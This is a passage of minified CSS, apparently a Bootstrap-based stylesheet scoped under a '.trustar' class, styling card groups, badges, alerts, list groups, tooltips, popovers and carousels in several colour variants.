.card-group>.card:first-child{border-top-right-radius:0;border-bottom-right-radius:0}.trustar .card-group>.card:first-child .card-img-top,.trustar .card-group>.card:first-child .card-header{border-top-right-radius:0}.trustar .card-group>.card:first-child .card-img-bottom,.trustar .card-group>.card:first-child .card-footer{border-bottom-right-radius:0}.trustar .card-group>.card:last-child{border-top-left-radius:0;border-bottom-left-radius:0}.trustar .card-group>.card:last-child .card-img-top,.trustar .card-group>.card:last-child .card-header{border-top-left-radius:0}.trustar .card-group>.card:last-child .card-img-bottom,.trustar .card-group>.card:last-child .card-footer{border-bottom-left-radius:0}.trustar .card-group>.card:only-child{border-radius:.25rem}.trustar .card-group>.card:only-child .card-img-top,.trustar .card-group>.card:only-child .card-header{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar .card-group>.card:only-child .card-img-bottom,.trustar .card-group>.card:only-child .card-footer{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.trustar .card-group>.card:not(:first-child):not(:last-child):not(:only-child){border-radius:0}.trustar .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-img-top,.trustar .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-img-bottom,.trustar .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-header,.trustar .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-footer{border-radius:0}}.trustar .card-columns .card{margin-bottom:.75rem}@media (min-width: 576px){.trustar .card-columns{-webkit-column-count:3;column-count:3;-webkit-column-gap:1.25rem;column-gap:1.25rem;orphans:1;widows:1}.trustar .card-columns .card{display:inline-block;width:100%}}.trustar .accordion .card{overflow:hidden}.trustar .accordion .card:not(:first-of-type) .card-header:first-child{border-radius:0}.trustar .accordion .card:not(:first-of-type):not(:last-of-type){border-bottom:0;border-radius:0}.trustar .accordion .card:first-of-type{border-bottom:0;border-bottom-right-radius:0;border-bottom-left-radius:0}.trustar .accordion .card:last-of-type{border-top-left-radius:0;border-top-right-radius:0}.trustar .accordion .card .card-header{margin-bottom:-1px}.trustar .breadcrumb{display:flex;flex-wrap:wrap;padding:.75rem 1rem;margin-bottom:1rem;list-style:none;background-color:#e9ecef;border-radius:.25rem}.trustar .breadcrumb-item+.breadcrumb-item{padding-left:.5rem}.trustar .breadcrumb-item+.breadcrumb-item::before{display:inline-block;padding-right:.5rem;color:#6c757d;content:\"/\"}.trustar .breadcrumb-item+.breadcrumb-item:hover::before{text-decoration:underline}.trustar .breadcrumb-item+.breadcrumb-item:hover::before{text-decoration:none}.trustar .breadcrumb-item.active{color:#6c757d}.trustar .pagination{display:flex;padding-left:0;list-style:none;border-radius:.25rem}.trustar .page-link{position:relative;display:block;padding:.5rem .75rem;margin-left:-1px;line-height:1.25;color:#007bff;background-color:#fff;border:1px solid #dee2e6}.trustar .page-link:hover{z-index:2;color:#0056b3;text-decoration:none;background-color:#e9ecef;border-color:#dee2e6}.trustar .page-link:focus{z-index:2;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar .page-link:not(:disabled):not(.disabled){cursor:pointer}.trustar .page-item:first-child .page-link{margin-left:0;border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.trustar .page-item:last-child .page-link{border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.trustar .page-item.active .page-link{z-index:1;color:#fff;background-color:#007bff;border-color:#007bff}.trustar .page-item.disabled .page-link{color:#6c757d;pointer-events:none;cursor:auto;background-color:#fff;border-color:#dee2e6}.trustar .pagination-lg .page-link{padding:.75rem 1.5rem;font-size:1.25rem;line-height:1.5}.trustar .pagination-lg .page-item:first-child .page-link{border-top-left-radius:.3rem;border-bottom-left-radius:.3rem}.trustar .pagination-lg .page-item:last-child .page-link{border-top-right-radius:.3rem;border-bottom-right-radius:.3rem}.trustar .pagination-sm .page-link{padding:.25rem .5rem;font-size:.875rem;line-height:1.5}.trustar .pagination-sm .page-item:first-child .page-link{border-top-left-radius:.2rem;border-bottom-left-radius:.2rem}.trustar .pagination-sm .page-item:last-child .page-link{border-top-right-radius:.2rem;border-bottom-right-radius:.2rem}.trustar .badge{display:inline-block;padding:.25em .4em;font-size:75%;font-weight:700;line-height:1;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25rem}a.trustar .badge:hover,a.trustar .badge:focus{text-decoration:none}.trustar .badge:empty{display:none}.trustar .btn .badge{position:relative;top:-1px}.trustar .badge-pill{padding-right:.6em;padding-left:.6em;border-radius:10rem}.trustar .badge-primary{color:#fff;background-color:#3568d5}a.trustar .badge-primary:hover,a.trustar .badge-primary:focus{color:#fff;background-color:#2552b2}.trustar .badge-secondary{color:#212529;background-color:#ff9a6f}a.trustar .badge-secondary:hover,a.trustar .badge-secondary:focus{color:#212529;background-color:#ff763c}.trustar .badge-success{color:#fff;background-color:#28a745}a.trustar .badge-success:hover,a.trustar .badge-success:focus{color:#fff;background-color:#1e7e34}.trustar .badge-info{color:#fff;background-color:#17a2b8}a.trustar .badge-info:hover,a.trustar .badge-info:focus{color:#fff;background-color:#117a8b}.trustar .badge-warning{color:#212529;background-color:#ffc107}a.trustar .badge-warning:hover,a.trustar .badge-warning:focus{color:#212529;background-color:#d39e00}.trustar .badge-danger{color:#fff;background-color:#dc3545}a.trustar .badge-danger:hover,a.trustar .badge-danger:focus{color:#fff;background-color:#bd2130}.trustar .badge-light{color:#212529;background-color:#eaecf1}a.trustar .badge-light:hover,a.trustar .badge-light:focus{color:#212529;background-color:#cbd0dd}.trustar .badge-dark{color:#fff;background-color:#44546a}a.trustar .badge-dark:hover,a.trustar .badge-dark:focus{color:#fff;background-color:#303b4b}.trustar .badge-brand-primary{color:#fff;background-color:#3568d5}a.trustar .badge-brand-primary:hover,a.trustar .badge-brand-primary:focus{color:#fff;background-color:#2552b2}.trustar .badge-brand-secondary{color:#212529;background-color:#ff9a6f}a.trustar .badge-brand-secondary:hover,a.trustar .badge-brand-secondary:focus{color:#212529;background-color:#ff763c}.trustar .badge-functional-success{color:#fff;background-color:#417505}a.trustar .badge-functional-success:hover,a.trustar .badge-functional-success:focus{color:#fff;background-color:#264403}.trustar .badge-functional-info{color:#fff;background-color:#4a90e2}a.trustar .badge-functional-info:hover,a.trustar .badge-functional-info:focus{color:#fff;background-color:#2275d7}.trustar .badge-functional-warning{color:#212529;background-color:#f5a623}a.trustar .badge-functional-warning:hover,a.trustar .badge-functional-warning:focus{color:#212529;background-color:#db8c0a}.trustar .badge-functional-danger{color:#fff;background-color:#d0021b}a.trustar .badge-functional-danger:hover,a.trustar .badge-functional-danger:focus{color:#fff;background-color:#9d0214}.trustar .badge-functional-accept{color:#212529;background-color:#fff}a.trustar .badge-functional-accept:hover,a.trustar .badge-functional-accept:focus{color:#212529;background-color:#e6e6e6}.trustar .badge-functional-decline{color:#212529;background-color:#fff}a.trustar .badge-functional-decline:hover,a.trustar .badge-functional-decline:focus{color:#212529;background-color:#e6e6e6}.trustar .badge-operational-critical{color:#212529;background-color:#fff}a.trustar .badge-operational-critical:hover,a.trustar .badge-operational-critical:focus{color:#212529;background-color:#e6e6e6}.trustar .badge-operational-error{color:#212529;background-color:#fff}a.trustar .badge-operational-error:hover,a.trustar .badge-operational-error:focus{color:#212529;background-color:#e6e6e6}.trustar .badge-operational-warning{color:#212529;background-color:#fff}a.trustar .badge-operational-warning:hover,a.trustar .badge-operational-warning:focus{color:#212529;background-color:#e6e6e6}.trustar .badge-operational-info{color:#212529;background-color:#fff}a.trustar .badge-operational-info:hover,a.trustar .badge-operational-info:focus{color:#212529;background-color:#e6e6e6}.trustar .jumbotron{padding:2rem 1rem;margin-bottom:2rem;background-color:#e9ecef;border-radius:.3rem}@media (min-width: 576px){.trustar .jumbotron{padding:4rem 2rem}}.trustar .jumbotron-fluid{padding-right:0;padding-left:0;border-radius:0}.trustar .alert{position:relative;padding:.75rem 1.25rem;margin-bottom:1rem;border:1px solid transparent;border-radius:.25rem}.trustar .alert-heading{color:inherit}.trustar .alert-link{font-weight:700}.trustar .alert-dismissible{padding-right:4rem}.trustar .alert-dismissible .close{position:absolute;top:0;right:0;padding:.75rem 1.25rem;color:inherit}.trustar .alert-primary{color:#1c366f;background-color:#d7e1f7;border-color:#c6d5f3}.trustar .alert-primary hr{border-top-color:#b1c5ef}.trustar .alert-primary .alert-link{color:#122246}.trustar .alert-secondary{color:#85503a;background-color:#ffebe2;border-color:#ffe3d7}.trustar .alert-secondary hr{border-top-color:#ffd1be}.trustar .alert-secondary .alert-link{color:#613b2b}.trustar .alert-success{color:#155724;background-color:#d4edda;border-color:#c3e6cb}.trustar .alert-success hr{border-top-color:#b1dfbb}.trustar .alert-success .alert-link{color:#0b2e13}.trustar .alert-info{color:#0c5460;background-color:#d1ecf1;border-color:#bee5eb}.trustar .alert-info hr{border-top-color:#abdde5}.trustar .alert-info .alert-link{color:#062c33}.trustar .alert-warning{color:#856404;background-color:#fff3cd;border-color:#ffeeba}.trustar .alert-warning hr{border-top-color:#ffe8a1}.trustar .alert-warning .alert-link{color:#533f03}.trustar .alert-danger{color:#721c24;background-color:#f8d7da;border-color:#f5c6cb}.trustar .alert-danger hr{border-top-color:#f1b0b7}.trustar .alert-danger .alert-link{color:#491217}.trustar .alert-light{color:#7a7b7d;background-color:#fbfbfc;border-color:#f9fafb}.trustar .alert-light hr{border-top-color:#eaedf1}.trustar .alert-light .alert-link{color:#616263}.trustar .alert-dark{color:#232c37;background-color:#dadde1;border-color:#cbcfd5}.trustar .alert-dark hr{border-top-color:#bdc2ca}.trustar .alert-dark .alert-link{color:#0f1318}.trustar .alert-brand-primary{color:#1c366f;background-color:#d7e1f7;border-color:#c6d5f3}.trustar .alert-brand-primary hr{border-top-color:#b1c5ef}.trustar .alert-brand-primary .alert-link{color:#122246}.trustar .alert-brand-secondary{color:#85503a;background-color:#ffebe2;border-color:#ffe3d7}.trustar .alert-brand-secondary hr{border-top-color:#ffd1be}.trustar .alert-brand-secondary .alert-link{color:#613b2b}.trustar .alert-functional-success{color:#223d03;background-color:#d9e3cd;border-color:#cad8b9}.trustar .alert-functional-success hr{border-top-color:#becfa9}.trustar .alert-functional-success .alert-link{color:#070c01}.trustar .alert-functional-info{color:#264b76;background-color:#dbe9f9;border-color:#cce0f7}.trustar .alert-functional-info hr{border-top-color:#b6d3f4}.trustar .alert-functional-info .alert-link{color:#1a324f}.trustar .alert-functional-warning{color:#7f5612;background-color:#fdedd3;border-color:#fce6c1}.trustar .alert-functional-warning hr{border-top-color:#fbdca9}.trustar .alert-functional-warning .alert-link{color:#52380c}.trustar .alert-functional-danger{color:#6c010e;background-color:#f6ccd1;border-color:#f2b8bf}.trustar .alert-functional-danger hr{border-top-color:#eea2ac}.trustar .alert-functional-danger .alert-link{color:#390107}.trustar .alert-functional-accept{color:#858585;background-color:#fff;border-color:#fff}.trustar .alert-functional-accept hr{border-top-color:#f2f2f2}.trustar .alert-functional-accept .alert-link{color:#6c6c6c}.trustar .alert-functional-decline{color:#858585;background-color:#fff;border-color:#fff}.trustar .alert-functional-decline hr{border-top-color:#f2f2f2}.trustar .alert-functional-decline .alert-link{color:#6c6c6c}.trustar .alert-operational-critical{color:#858585;background-color:#fff;border-color:#fff}.trustar .alert-operational-critical hr{border-top-color:#f2f2f2}.trustar .alert-operational-critical .alert-link{color:#6c6c6c}.trustar .alert-operational-error{color:#858585;background-color:#fff;border-color:#fff}.trustar .alert-operational-error hr{border-top-color:#f2f2f2}.trustar .alert-operational-error .alert-link{color:#6c6c6c}.trustar .alert-operational-warning{color:#858585;background-color:#fff;border-color:#fff}.trustar .alert-operational-warning hr{border-top-color:#f2f2f2}.trustar .alert-operational-warning .alert-link{color:#6c6c6c}.trustar .alert-operational-info{color:#858585;background-color:#fff;border-color:#fff}.trustar .alert-operational-info hr{border-top-color:#f2f2f2}.trustar .alert-operational-info .alert-link{color:#6c6c6c}@-webkit-keyframes progress-bar-stripes{from{background-position:1rem 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:1rem 0}to{background-position:0 0}}.trustar .progress{display:flex;height:1rem;overflow:hidden;font-size:.75rem;background-color:#e9ecef;border-radius:.25rem}.trustar .progress-bar{display:flex;flex-direction:column;justify-content:center;color:#fff;text-align:center;white-space:nowrap;background-color:#007bff;transition:width 0.6s ease}@media screen and (prefers-reduced-motion: reduce){.trustar .progress-bar{transition:none}}.trustar .progress-bar-striped{background-image:linear-gradient(45deg, rgba(255,255,255,0.15) 25%, transparent 25%, transparent 50%, rgba(255,255,255,0.15) 50%, rgba(255,255,255,0.15) 75%, transparent 75%, transparent);background-size:1rem 1rem}.trustar .progress-bar-animated{-webkit-animation:progress-bar-stripes 1s linear infinite;animation:progress-bar-stripes 1s linear infinite}.trustar .media{display:flex;align-items:flex-start}.trustar .media-body{flex:1}.trustar .list-group{display:flex;flex-direction:column;padding-left:0;margin-bottom:0}.trustar .list-group-item-action{width:100%;color:#495057;text-align:inherit}.trustar .list-group-item-action:hover,.trustar .list-group-item-action:focus{color:#495057;text-decoration:none;background-color:#f8f9fa}.trustar .list-group-item-action:active{color:#212529;background-color:#e9ecef}.trustar .list-group-item{position:relative;display:block;padding:.75rem 1.25rem;margin-bottom:-1px;background-color:#fff;border:1px solid rgba(0,0,0,0.125)}.trustar .list-group-item:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar .list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.trustar .list-group-item:hover,.trustar .list-group-item:focus{z-index:1;text-decoration:none}.trustar .list-group-item.disabled,.trustar .list-group-item:disabled{color:#6c757d;pointer-events:none;background-color:#fff}.trustar .list-group-item.active{z-index:2;color:#fff;background-color:#007bff;border-color:#007bff}.trustar .list-group-flush .list-group-item{border-right:0;border-left:0;border-radius:0}.trustar .list-group-flush .list-group-item:last-child{margin-bottom:-1px}.trustar .list-group-flush:first-child .list-group-item:first-child{border-top:0}.trustar .list-group-flush:last-child .list-group-item:last-child{margin-bottom:0;border-bottom:0}.trustar .list-group-item-primary{color:#1c366f;background-color:#c6d5f3}.trustar .list-group-item-primary.list-group-item-action:hover,.trustar .list-group-item-primary.list-group-item-action:focus{color:#1c366f;background-color:#b1c5ef}.trustar .list-group-item-primary.list-group-item-action.active{color:#fff;background-color:#1c366f;border-color:#1c366f}.trustar .list-group-item-secondary{color:#85503a;background-color:#ffe3d7}.trustar .list-group-item-secondary.list-group-item-action:hover,.trustar .list-group-item-secondary.list-group-item-action:focus{color:#85503a;background-color:#ffd1be}.trustar .list-group-item-secondary.list-group-item-action.active{color:#fff;background-color:#85503a;border-color:#85503a}.trustar .list-group-item-success{color:#155724;background-color:#c3e6cb}.trustar .list-group-item-success.list-group-item-action:hover,.trustar .list-group-item-success.list-group-item-action:focus{color:#155724;background-color:#b1dfbb}.trustar .list-group-item-success.list-group-item-action.active{color:#fff;background-color:#155724;border-color:#155724}.trustar .list-group-item-info{color:#0c5460;background-color:#bee5eb}.trustar .list-group-item-info.list-group-item-action:hover,.trustar .list-group-item-info.list-group-item-action:focus{color:#0c5460;background-color:#abdde5}.trustar .list-group-item-info.list-group-item-action.active{color:#fff;background-color:#0c5460;border-color:#0c5460}.trustar .list-group-item-warning{color:#856404;background-color:#ffeeba}.trustar .list-group-item-warning.list-group-item-action:hover,.trustar .list-group-item-warning.list-group-item-action:focus{color:#856404;background-color:#ffe8a1}.trustar .list-group-item-warning.list-group-item-action.active{color:#fff;background-color:#856404;border-color:#856404}.trustar .list-group-item-danger{color:#721c24;background-color:#f5c6cb}.trustar .list-group-item-danger.list-group-item-action:hover,.trustar .list-group-item-danger.list-group-item-action:focus{color:#721c24;background-color:#f1b0b7}.trustar .list-group-item-danger.list-group-item-action.active{color:#fff;background-color:#721c24;border-color:#721c24}.trustar .list-group-item-light{color:#7a7b7d;background-color:#f9fafb}.trustar .list-group-item-light.list-group-item-action:hover,.trustar .list-group-item-light.list-group-item-action:focus{color:#7a7b7d;background-color:#eaedf1}.trustar .list-group-item-light.list-group-item-action.active{color:#fff;background-color:#7a7b7d;border-color:#7a7b7d}.trustar .list-group-item-dark{color:#232c37;background-color:#cbcfd5}.trustar .list-group-item-dark.list-group-item-action:hover,.trustar .list-group-item-dark.list-group-item-action:focus{color:#232c37;background-color:#bdc2ca}.trustar .list-group-item-dark.list-group-item-action.active{color:#fff;background-color:#232c37;border-color:#232c37}.trustar .list-group-item-brand-primary{color:#1c366f;background-color:#c6d5f3}.trustar .list-group-item-brand-primary.list-group-item-action:hover,.trustar .list-group-item-brand-primary.list-group-item-action:focus{color:#1c366f;background-color:#b1c5ef}.trustar .list-group-item-brand-primary.list-group-item-action.active{color:#fff;background-color:#1c366f;border-color:#1c366f}.trustar .list-group-item-brand-secondary{color:#85503a;background-color:#ffe3d7}.trustar .list-group-item-brand-secondary.list-group-item-action:hover,.trustar .list-group-item-brand-secondary.list-group-item-action:focus{color:#85503a;background-color:#ffd1be}.trustar .list-group-item-brand-secondary.list-group-item-action.active{color:#fff;background-color:#85503a;border-color:#85503a}.trustar .list-group-item-functional-success{color:#223d03;background-color:#cad8b9}.trustar .list-group-item-functional-success.list-group-item-action:hover,.trustar .list-group-item-functional-success.list-group-item-action:focus{color:#223d03;background-color:#becfa9}.trustar .list-group-item-functional-success.list-group-item-action.active{color:#fff;background-color:#223d03;border-color:#223d03}.trustar .list-group-item-functional-info{color:#264b76;background-color:#cce0f7}.trustar .list-group-item-functional-info.list-group-item-action:hover,.trustar .list-group-item-functional-info.list-group-item-action:focus{color:#264b76;background-color:#b6d3f4}.trustar .list-group-item-functional-info.list-group-item-action.active{color:#fff;background-color:#264b76;border-color:#264b76}.trustar .list-group-item-functional-warning{color:#7f5612;background-color:#fce6c1}.trustar .list-group-item-functional-warning.list-group-item-action:hover,.trustar .list-group-item-functional-warning.list-group-item-action:focus{color:#7f5612;background-color:#fbdca9}.trustar .list-group-item-functional-warning.list-group-item-action.active{color:#fff;background-color:#7f5612;border-color:#7f5612}.trustar .list-group-item-functional-danger{color:#6c010e;background-color:#f2b8bf}.trustar .list-group-item-functional-danger.list-group-item-action:hover,.trustar .list-group-item-functional-danger.list-group-item-action:focus{color:#6c010e;background-color:#eea2ac}.trustar .list-group-item-functional-danger.list-group-item-action.active{color:#fff;background-color:#6c010e;border-color:#6c010e}.trustar .list-group-item-functional-accept{color:#858585;background-color:#fff}.trustar .list-group-item-functional-accept.list-group-item-action:hover,.trustar .list-group-item-functional-accept.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar .list-group-item-functional-accept.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar .list-group-item-functional-decline{color:#858585;background-color:#fff}.trustar .list-group-item-functional-decline.list-group-item-action:hover,.trustar .list-group-item-functional-decline.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar .list-group-item-functional-decline.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar .list-group-item-operational-critical{color:#858585;background-color:#fff}.trustar .list-group-item-operational-critical.list-group-item-action:hover,.trustar .list-group-item-operational-critical.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar .list-group-item-operational-critical.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar .list-group-item-operational-error{color:#858585;background-color:#fff}.trustar .list-group-item-operational-error.list-group-item-action:hover,.trustar .list-group-item-operational-error.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar .list-group-item-operational-error.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar .list-group-item-operational-warning{color:#858585;background-color:#fff}.trustar .list-group-item-operational-warning.list-group-item-action:hover,.trustar .list-group-item-operational-warning.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar .list-group-item-operational-warning.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar .list-group-item-operational-info{color:#858585;background-color:#fff}.trustar .list-group-item-operational-info.list-group-item-action:hover,.trustar .list-group-item-operational-info.list-group-item-action:focus{color:#858585;background-color:#f2f2f2}.trustar .list-group-item-operational-info.list-group-item-action.active{color:#fff;background-color:#858585;border-color:#858585}.trustar .close{float:right;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.5}.trustar .close:hover{color:#000;text-decoration:none}.trustar .close:not(:disabled):not(.disabled){cursor:pointer}.trustar .close:not(:disabled):not(.disabled):hover,.trustar .close:not(:disabled):not(.disabled):focus{opacity:.75}.trustar button.close{padding:0;background-color:transparent;border:0;-webkit-appearance:none;-moz-appearance:none;appearance:none}.trustar a.close.disabled{pointer-events:none}.trustar .tooltip{position:absolute;z-index:1070;display:block;margin:0;font-family:-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,\"Helvetica Neue\",Arial,\"Noto Sans\",sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\",\"Segoe UI Symbol\",\"Noto Color Emoji\";font-style:normal;font-weight:400;line-height:1.5;text-align:left}[dir=\"ltr\"] .trustar .tooltip{text-align:left}[dir=\"rtl\"] .trustar .tooltip{text-align:right}.trustar .tooltip{text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.875rem;word-wrap:break-word;opacity:0}.trustar .tooltip.show{opacity:.9}.trustar .tooltip .arrow{position:absolute;display:block;width:.8rem;height:.4rem}.trustar .tooltip .arrow::before{position:absolute;content:\"\";border-color:transparent;border-style:solid}.trustar .bs-tooltip-top,.trustar .bs-tooltip-auto[x-placement^=\"top\"]{padding:.4rem 0}.trustar .bs-tooltip-top .arrow,.trustar .bs-tooltip-auto[x-placement^=\"top\"] .arrow{bottom:0}.trustar .bs-tooltip-top .arrow::before,.trustar .bs-tooltip-auto[x-placement^=\"top\"] .arrow::before{top:0;border-width:.4rem .4rem 0;border-top-color:#000}.trustar .bs-tooltip-right,.trustar .bs-tooltip-auto[x-placement^=\"right\"]{padding:0 .4rem}.trustar .bs-tooltip-right .arrow,.trustar .bs-tooltip-auto[x-placement^=\"right\"] .arrow{left:0;width:.4rem;height:.8rem}.trustar .bs-tooltip-right .arrow::before,.trustar .bs-tooltip-auto[x-placement^=\"right\"] .arrow::before{right:0;border-width:.4rem .4rem .4rem 0;border-right-color:#000}.trustar .bs-tooltip-bottom,.trustar .bs-tooltip-auto[x-placement^=\"bottom\"]{padding:.4rem 0}.trustar .bs-tooltip-bottom .arrow,.trustar .bs-tooltip-auto[x-placement^=\"bottom\"] .arrow{top:0}.trustar .bs-tooltip-bottom .arrow::before,.trustar .bs-tooltip-auto[x-placement^=\"bottom\"] .arrow::before{bottom:0;border-width:0 .4rem .4rem;border-bottom-color:#000}.trustar .bs-tooltip-left,.trustar .bs-tooltip-auto[x-placement^=\"left\"]{padding:0 .4rem}.trustar .bs-tooltip-left .arrow,.trustar .bs-tooltip-auto[x-placement^=\"left\"] .arrow{right:0;width:.4rem;height:.8rem}.trustar .bs-tooltip-left .arrow::before,.trustar .bs-tooltip-auto[x-placement^=\"left\"] .arrow::before{left:0;border-width:.4rem 0 .4rem .4rem;border-left-color:#000}.trustar .tooltip-inner{max-width:200px;padding:.25rem .5rem;color:#fff;text-align:center;background-color:#000;border-radius:.25rem}.trustar .popover{position:absolute;top:0;left:0;z-index:1060;display:block;max-width:276px;font-family:-apple-system,BlinkMacSystemFont,\"Segoe UI\",Roboto,\"Helvetica Neue\",Arial,\"Noto Sans\",sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\",\"Segoe UI Symbol\",\"Noto Color Emoji\";font-style:normal;font-weight:400;line-height:1.5;text-align:left}[dir=\"ltr\"] .trustar .popover{text-align:left}[dir=\"rtl\"] .trustar .popover{text-align:right}.trustar .popover{text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.875rem;word-wrap:break-word;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,0.2);border-radius:.3rem}.trustar .popover .arrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.trustar .popover .arrow::before,.trustar .popover .arrow::after{position:absolute;display:block;content:\"\";border-color:transparent;border-style:solid}.trustar .bs-popover-top,.trustar .bs-popover-auto[x-placement^=\"top\"]{margin-bottom:.5rem}.trustar .bs-popover-top .arrow,.trustar .bs-popover-auto[x-placement^=\"top\"] .arrow{bottom:calc((.5rem + 1px) * -1)}.trustar .bs-popover-top .arrow::before,.trustar .bs-popover-auto[x-placement^=\"top\"] .arrow::before,.trustar .bs-popover-top .arrow::after,.trustar .bs-popover-auto[x-placement^=\"top\"] .arrow::after{border-width:.5rem .5rem 0}.trustar .bs-popover-top .arrow::before,.trustar .bs-popover-auto[x-placement^=\"top\"] .arrow::before{bottom:0;border-top-color:rgba(0,0,0,0.25)}.trustar .bs-popover-top .arrow::after,.trustar .bs-popover-auto[x-placement^=\"top\"] .arrow::after{bottom:1px;border-top-color:#fff}.trustar .bs-popover-right,.trustar .bs-popover-auto[x-placement^=\"right\"]{margin-left:.5rem}.trustar .bs-popover-right .arrow,.trustar .bs-popover-auto[x-placement^=\"right\"] .arrow{left:calc((.5rem + 1px) * -1);width:.5rem;height:1rem;margin:.3rem 0}.trustar .bs-popover-right .arrow::before,.trustar .bs-popover-auto[x-placement^=\"right\"] .arrow::before,.trustar .bs-popover-right .arrow::after,.trustar .bs-popover-auto[x-placement^=\"right\"] .arrow::after{border-width:.5rem .5rem .5rem 0}.trustar .bs-popover-right .arrow::before,.trustar .bs-popover-auto[x-placement^=\"right\"] .arrow::before{left:0;border-right-color:rgba(0,0,0,0.25)}.trustar .bs-popover-right .arrow::after,.trustar .bs-popover-auto[x-placement^=\"right\"] .arrow::after{left:1px;border-right-color:#fff}.trustar .bs-popover-bottom,.trustar .bs-popover-auto[x-placement^=\"bottom\"]{margin-top:.5rem}.trustar .bs-popover-bottom .arrow,.trustar .bs-popover-auto[x-placement^=\"bottom\"] .arrow{top:calc((.5rem + 1px) * -1)}.trustar .bs-popover-bottom .arrow::before,.trustar .bs-popover-auto[x-placement^=\"bottom\"] .arrow::before,.trustar .bs-popover-bottom .arrow::after,.trustar .bs-popover-auto[x-placement^=\"bottom\"] .arrow::after{border-width:0 .5rem .5rem .5rem}.trustar .bs-popover-bottom .arrow::before,.trustar .bs-popover-auto[x-placement^=\"bottom\"] .arrow::before{top:0;border-bottom-color:rgba(0,0,0,0.25)}.trustar .bs-popover-bottom .arrow::after,.trustar .bs-popover-auto[x-placement^=\"bottom\"] .arrow::after{top:1px;border-bottom-color:#fff}.trustar .bs-popover-bottom .popover-header::before,.trustar .bs-popover-auto[x-placement^=\"bottom\"] .popover-header::before{position:absolute;top:0;left:50%;display:block;width:1rem;margin-left:-.5rem;content:\"\";border-bottom:1px solid #f7f7f7}.trustar .bs-popover-left,.trustar .bs-popover-auto[x-placement^=\"left\"]{margin-right:.5rem}.trustar .bs-popover-left .arrow,.trustar .bs-popover-auto[x-placement^=\"left\"] .arrow{right:calc((.5rem + 1px) * -1);width:.5rem;height:1rem;margin:.3rem 0}.trustar .bs-popover-left .arrow::before,.trustar .bs-popover-auto[x-placement^=\"left\"] .arrow::before,.trustar .bs-popover-left .arrow::after,.trustar .bs-popover-auto[x-placement^=\"left\"] .arrow::after{border-width:.5rem 0 .5rem .5rem}.trustar .bs-popover-left .arrow::before,.trustar .bs-popover-auto[x-placement^=\"left\"] .arrow::before{right:0;border-left-color:rgba(0,0,0,0.25)}.trustar .bs-popover-left .arrow::after,.trustar .bs-popover-auto[x-placement^=\"left\"] .arrow::after{right:1px;border-left-color:#fff}.trustar .popover-header{padding:.5rem .75rem;margin-bottom:0;font-size:1rem;color:inherit;background-color:#f7f7f7;border-bottom:1px solid #ebebeb;border-top-left-radius:calc(.3rem - 1px);border-top-right-radius:calc(.3rem - 1px)}.trustar .popover-header:empty{display:none}.trustar .popover-body{padding:.5rem .75rem;color:#212529}.trustar .carousel{position:relative}.trustar .carousel.pointer-event{touch-action:pan-y}.trustar .carousel-inner{position:relative;width:100%;overflow:hidden}.trustar .carousel-inner::after{display:block;clear:both;content:\"\"}.trustar .carousel-item{position:relative;display:none;float:left;width:100%;margin-right:-100%;-webkit-backface-visibility:hidden;backface-visibility:hidden;transition:-webkit-transform .6s ease-in-out;transition:transform .6s ease-in-out;transition:transform .6s ease-in-out, -webkit-transform .6s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar .carousel-item{transition:none}}.trustar .carousel-item.active,.trustar .carousel-item-next,.trustar .carousel-item-prev{display:block}.trustar .carousel-item-next:not(.carousel-item-left),.trustar .active.carousel-item-right{-webkit-transform:translateX(100%);transform:translateX(100%)}.trustar .carousel-item-prev:not(.carousel-item-right),.trustar .active.carousel-item-left{-webkit-transform:translateX(-100%);transform:translateX(-100%)}.trustar .carousel-fade .carousel-item{opacity:0;transition-property:opacity;-webkit-transform:none;transform:none}.trustar .carousel-fade .carousel-item.active,.trustar .carousel-fade .carousel-item-next.carousel-item-left,.trustar .carousel-fade .carousel-item-prev.carousel-item-right{z-index:1;opacity:1}.trustar .carousel-fade .active.carousel-item-left,.trustar .carousel-fade .active.carousel-item-right{z-index:0;opacity:0;transition:0s .6s opacity}@media screen and (prefers-reduced-motion: reduce){.trustar .carousel-fade .active.carousel-item-left,.trustar .carousel-fade .active.carousel-item-right{transition:none}}.trustar .carousel-control-prev,.trustar .carousel-control-next{position:absolute;top:0;bottom:0;z-index:1;display:flex;align-items:center;justify-content:center;width:15%;color:#fff;text-align:center;opacity:.5;transition:opacity 0.15s ease}@media screen and (prefers-reduced-motion: reduce){.trustar .carousel-control-prev,.trustar .carousel-control-next{transition:none}}.trustar .carousel-control-prev:hover,.trustar 